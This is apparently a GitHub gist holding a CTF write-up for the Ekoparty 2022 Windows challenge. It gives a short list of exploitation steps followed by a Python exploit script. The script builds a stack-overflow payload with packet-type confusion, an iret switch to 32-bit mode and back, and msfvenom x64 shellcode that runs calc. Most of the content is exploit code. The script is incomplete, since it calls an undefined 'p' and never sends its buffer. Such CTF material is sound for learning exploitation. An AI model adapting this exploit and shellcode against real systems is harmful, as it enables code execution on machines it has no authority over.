Skip to content

Instantly share code, notes, and snippets.


xct/ Secret

Last active November 4, 2022 20:23
Show Gist options
  • Save xct/c4569bd15ad85ea1b5917325b203e15b to your computer and use it in GitHub Desktop.
Save xct/c4569bd15ad85ea1b5917325b203e15b to your computer and use it in GitHub Desktop.

Ekoparty2022 Windows Challenge

  • Find handshake, packet type byte, packet size from reversing
  • Find that packet size > 0x0f00 can be used to cause a stack overflow when the buffer gets copied onto the stack
  • Find that overflow can turn packet type from T to X which leads to a basic block that jumps exactly behind our payload
  • Find that "random" initialization of heap memory is not so random and we can use the iret to transition to 32-bit (we cant use 0x2b and 0x33 since these are bad bytes)
  • Use jmp 0x33:0x100000xx to get back to 64-bit (
  • Restore stack pointer from rcx
  • MSF Shellcode

Tested on Win11 21H2

#!/usr/bin/env python3
# Author: @xct_de
import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);
PORT = 31415
sc = b""
#sc += b"\xcc"
# transition from x86 to x64 by using jmp 0x33:0x10000020
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
# msfvenom -p windows/x64/exec cmd="calc" -f python -b '\x2b\x33'
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"
# handshake
p.recv(3) # Hi\x00
buf = b""
buf += b"Eko2022\x00" # cookie
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion leads to stack overflow
# switch from x64 to x86 via iret
iret = b""
iret += p32(0x10000014) # rip/eip
iret += p32(0x23) # 33=x64
iret += p32(0x00010202) # from debugging
iret += p32(0x10000400) # rsp/esp
iret += p32(0x53) # 2b=x64
buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment